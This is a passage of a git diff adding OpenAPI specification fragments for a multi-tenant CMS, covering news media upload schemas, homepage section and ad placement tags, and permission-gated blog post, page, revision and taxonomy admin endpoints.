+          format: date-time
+    HomepageSectionUpdateRequest:
+      description: sectionType cannot be changed after creation — omit it, do not send the old or a new value.
+      type: object
+      properties:
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
     ModuleCatalogEntry:
       type: object
       properties:
@@ -10793,6 +11628,114 @@ components:
           type: array
           items:
             type: string
+    NewsMediaObjectItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - objectKey
+        - publicUrl
+        - mimeType
+        - status
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        moduleKey:
+          type: string
+        ownerResourceType:
+          type: string
+          nullable: true
+          enum:
+            - blog_post
+            - blog_page
+            - homepage_section
+            - gallery_item
+            - ad
+            - video_thumbnail
+            - seo_image
+            - null
+        ownerResourceId:
+          type: string
+          format: uuid
+          nullable: true
+        storageDriver:
+          type: string
+          enum:
+            - cloudflare_r2
+        objectKey:
+          type: string
+        originalFilename:
+          type: string
+          nullable: true
+        publicUrl:
+          type: string
+          format: uri
+        mimeType:
+          type: string
+        sizeBytes:
+          type: integer
+          nullable: true
+        checksumSha256:
+          type: string
+          nullable: true
+        width:
+          type: integer
+          nullable: true
+        height:
+          type: integer
+          nullable: true
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+        status:
+          type: string
+          enum:
+            - pending_upload
+            - uploaded
+            - verified
+            - attached
+            - orphaned
+            - deleted
+            - failed
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+    NewsMediaUploadSessionCreated:
+      type: object
+      required:
+        - objectId
+        - objectKey
+        - presignedUrl
+        - expiresAt
+      additionalProperties: false
+      properties:
+        objectId:
+          type: string
+          format: uuid
+        objectKey:
+          type: string
+          description: Server-generated — news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}. Never derived from client input.
+          example: news-media/3fa85f64-5717-4562-b3fc-2c963f66afa6/2026/07/1b9d6bcd-bbfd-4b2d-9b5d-ab8dfbbd4bed.jpg
+        presignedUrl:
+          type: string
+          format: uri
+          description: Short-lived presigned PUT URL scoped to exactly one object key. Never includes raw R2 credentials.
+        expiresAt:
+          type: string
+          format: date-time
     Office:
       type: object
       properties:

--- a/openapi/awcms-public-api.src.yaml
+++ b/openapi/awcms-public-api.src.yaml
@@ -49,6 +49,12 @@ tags:
     description: Transactional, versioned domain-event outbox and dispatcher admin API — read-only inspection of outbox events and per-consumer deliveries (redacted payload projections only), permission-gated/reason-required/idempotent/audited replay of a dead-lettered delivery, and per-tenant pause/resume of a registered consumer.
   - name: Theming
     description: Tenant-selectable presentation (ADR-0034 Fase 3 — the first website module in the base). Select a trusted, reviewed, build-time theme and configure it by DATA only (design tokens, slot variants, media asset ids, section order, nav placement) — no uploaded code, no arbitrary templates. Every token value is validated by rejection against strict CSS grammars; published versions are immutable; publish/rollback/retire are ABAC-gated, idempotency-keyed, and audited.
+  - name: News Media
+    description: Direct-to-R2 presigned upload flow for news images (news_portal module, ported from awcms-mini) — create an upload session (server-generated object key + short-lived presigned PUT URL), finalize (real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum, never a bare HEAD), and cancel a still-pending_upload session. R2 credentials are never exposed to the browser; only a scoped, expiring presigned URL is returned.
+  - name: News Portal Homepage Sections
+    description: Editorial homepage section composer (news_portal module) — tenant-scoped, RLS-protected CRUD for configurable homepage sections (headline, latest_posts, featured_posts, editor_picks, category_grid, gallery_block). config shape is validated per sectionType server-side; every referenced post/category/media object must already exist for the same tenant (and gallery_block media must be a verified R2 media object). sectionType is immutable after creation; reordering is just a patchable sortOrder field.
+  - name: News Portal Ad Placements
+    description: R2-only advertisement placement presets for the news portal (news_portal module) — tenant-scoped, RLS-protected CRUD for ads assigned to a fixed set of placement keys. mediaObjectId must reference a verified R2 media object belonging to the same tenant — never a local path or arbitrary external image URL. linkUrl is optional and may be external, but is validated server-side as an absolute http(s) URL only.
 security:
   - bearerAuth: []
     tenantHeader: []

--- a/openapi/modules/blog-content.openapi.yaml
+++ b/openapi/modules/blog-content.openapi.yaml
@@ -1,0 +1,2565 @@
+# Source fragment for the "Blog Content" module/tag — ported from awcms-mini
+# (epic #536, issues #537-#543 plus the later hardening lineage; see
+# src/modules/blog-content/module.ts's own description field and README.md
+# for the full port-adaptation notes, including what was deliberately
+# dropped: the host-resolved /news/** route family and its two ports'
+# concrete adapters, replaced here by this module's own no-op adapters).
+#
+# Owns every `/api/v1/blog/*` admin path and the schemas referenced ONLY by
+# this tag's operations. The public, anonymous `/blog/{tenantCode}/...`
+# route family (index/detail/category/tag/search/feed/sitemap) is NOT here —
+# same convention theming's own public preview routes use (Astro
+# text/html/xml routes under src/pages/**, not src/pages/api/v1/**, so they
+# are outside the api-spec-check route tree).
+#
+# NOT independently valid OpenAPI -- $ref targets pointing at shared
+# components only resolve after `bun run openapi:bundle` merges this file
+# with the root and every sibling module fragment. Edit this file (or the
+# root for shared components), never the generated bundle.
+paths:
+  /api/v1/blog/posts:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPosts
+      summary: List this tenant's non-deleted blog posts
+      description: Gated by blog_content.posts.read. Optional ?status= filter, ?limit= bounded (default 20, max 100).
+      parameters:
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum: [draft, review, scheduled, published, archived]
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching posts.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      posts:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreatePost
+      summary: Create a draft blog post
+      description: Gated by blog_content.posts.create. Not idempotency-keyed (a retry duplicating a create is caught by the (tenant_id, locale, slug) partial unique index).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPostWriteInput"
+      responses:
+        "200":
+          description: Post created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A post already exists for this slug/locale, or the referenced media is not R2-verified in full-online R2-only mode (422 for the latter).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image/video-thumbnail references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPost
+      summary: Read one blog post
+      description: Gated by blog_content.posts.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The post.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdatePost
+      summary: Update a blog post
+      description: Gated by blog_content.posts.update (with an ownership carve-out — a draft's own author may update it without the broader permission). Only fields present in the body are changed. A significant title/contentJson/contentText change snapshots an append-only revision first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPostWriteInput"
+      responses:
+        "200":
+          description: Post updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: One or more image/video-thumbnail references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeletePost
+      summary: Soft delete a blog post
+      description: Gated by blog_content.posts.delete. Soft delete only (deleted_at/deleted_by/delete_reason) — see POST .../purge for the permanent, high-risk purge.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/submit-review:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogSubmitPostForReview
+      summary: Submit a draft post for review
+      description: Transitions draft -> review. Gated by blog_content.posts.update (same ownership carve-out as PATCH .../{id}). Not idempotency-keyed — the status transition is naturally idempotent.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post submitted for review.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The post's current status cannot transition to review.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/publish:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogPublishPost
+      summary: Publish a blog post
+      description: Gated by blog_content.posts.publish (no ownership carve-out). High-risk, requires Idempotency-Key. Blocked (422) if the content quality checklist fails when full-online R2-only mode is active for the tenant. On success, also invokes the social-publishing outbox hook (a documented no-op in this base — social_publishing is not ported).
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post published (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: Publish is blocked by the content quality checklist.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/schedule:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogSchedulePost
+      summary: Schedule a blog post for future publishing
+      description: Gated by blog_content.posts.schedule. High-risk, requires Idempotency-Key. Same content quality checklist gate as publish. The blog:publish:scheduled job later performs the actual publish once scheduledAt <= now().
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [scheduledAt]
+              properties:
+                scheduledAt:
+                  type: string
+                  format: date-time
+      responses:
+        "200":
+          description: Post scheduled (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: Scheduling is blocked by the content quality checklist.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/archive:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogArchivePost
+      summary: Archive a blog post
+      description: Gated by blog_content.posts.archive. High-risk, requires Idempotency-Key.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post archived (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Invalid status transition, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/restore:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogRestorePost
+      summary: Restore a soft-deleted blog post
+      description: Gated by blog_content.posts.restore. High-risk, requires Idempotency-Key.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post restored (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/purge:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogPurgePost
+      summary: Permanently purge a soft-deleted blog post
+      description: Gated by blog_content.posts.purge. High-risk, irreversible, requires Idempotency-Key. Only a previously soft-deleted post may be purged.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post purged (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The post is not soft-deleted, or the Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/posts/{id}/quality-checklist:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPostQualityChecklist
+      summary: Preview the content quality checklist for a post
+      description: Read-only preview for the admin editor — runs the exact same evaluator POST .../publish and .../schedule enforce. Gated by blog_content.posts.read (no separate permission).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The checklist result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      postId:
+                        type: string
+                        format: uuid
+                      qualityChecklist:
+                        $ref: "#/components/schemas/ContentQualityChecklistResult"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/internal-links/preview:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogPreviewPostInternalLinks
+      summary: Preview automatic internal tag linking for a post
+      description: Read-only preview of which tags would be automatically linked in this post's rendered content before publishing. Gated by blog_content.internal_links.preview.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The preview result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      postId:
+                        type: string
+                        format: uuid
+                      enabled:
+                        type: boolean
+                      disabledReason:
+                        type: string
+                        nullable: true
+                        enum:
+                          [
+                            deployment_disabled,
+                            tenant_disabled,
+                            post_disabled,
+                            null
+                          ]
+                      matches:
+                        type: array
+                        items:
+                          type: object
+                      totalLinked:
+                        type: integer
+                      maxPerPost:
+                        type: integer
+                      maxPerTag:
+                        type: integer
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/revisions:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPostRevisions
+      summary: List a post's revision history
+      description: Gated by blog_content.revisions.read. Newest first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The revision list.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      revisions:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogRevision"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/revisions/{revisionId}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+      - name: revisionId
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPostRevision
+      summary: Read one revision of a post
+      description: Gated by blog_content.revisions.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The revision.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogRevision"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/posts/{id}/revisions/{revisionId}/restore:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+      - name: revisionId
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    post:
+      tags:
+        - Blog Content
+      operationId: blogRestorePostRevision
+      summary: Restore a post to an earlier revision
+      description: Gated by blog_content.revisions.restore. High-risk, requires Idempotency-Key. Restoring APPENDS a new revision snapshot of the restored content — it never overwrites or removes the revision being restored from.
+      parameters:
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Post restored to the given revision (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPost"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: The Idempotency-Key was already used with a different request.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image/video-thumbnail references in the restored content are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/pages:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListPages
+      summary: List this tenant's non-deleted blog pages
+      description: Gated by blog_content.pages.read. Optional ?status= filter, ?limit= bounded.
+      parameters:
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum: [draft, review, scheduled, published, archived]
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching pages.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      pages:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreatePage
+      summary: Create a draft blog page
+      description: Gated by blog_content.pages.create. Not idempotency-keyed (caught by the (tenant_id, locale, slug) partial unique index).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPageWriteInput"
+      responses:
+        "200":
+          description: Page created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A page already exists for this slug/locale.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: One or more image references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/pages/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPage
+      summary: Read one blog page
+      description: Gated by blog_content.pages.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The page.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdatePage
+      summary: Update a blog page
+      description: Gated by blog_content.pages.update. Only fields present in the body are changed. A significant change snapshots an append-only revision first.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogPageWriteInput"
+      responses:
+        "200":
+          description: Page updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: One or more image references are not valid R2 media objects in full-online R2-only mode.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeletePage
+      summary: Soft delete a blog page
+      description: Gated by blog_content.pages.delete.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Page soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogPage"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/pages/{id}/quality-checklist:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetPageQualityChecklist
+      summary: Preview the content quality checklist for a page
+      description: Read-only preview for the admin editor. Gated by blog_content.pages.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The checklist result.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      pageId:
+                        type: string
+                        format: uuid
+                      qualityChecklist:
+                        $ref: "#/components/schemas/ContentQualityChecklistResult"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/terms:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListTerms
+      summary: List this tenant's categories/tags
+      description: Gated by blog_content.taxonomies.read. Optional ?taxonomyType= filter.
+      parameters:
+        - name: taxonomyType
+          in: query
+          schema:
+            type: string
+            enum: [category, tag]
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching terms.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      terms:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateTerm
+      summary: Create a category or tag
+      description: Gated by blog_content.taxonomies.configure. A tag must never carry a parentId.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogTermWriteInput"
+      responses:
+        "200":
+          description: Term created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A term already exists for this taxonomyType/slug.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/terms/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTerm
+      summary: Update a category or tag
+      description: Gated by blog_content.taxonomies.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/BlogTermWriteInput"
+      responses:
+        "200":
+          description: Term updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteTerm
+      summary: Soft delete a category or tag
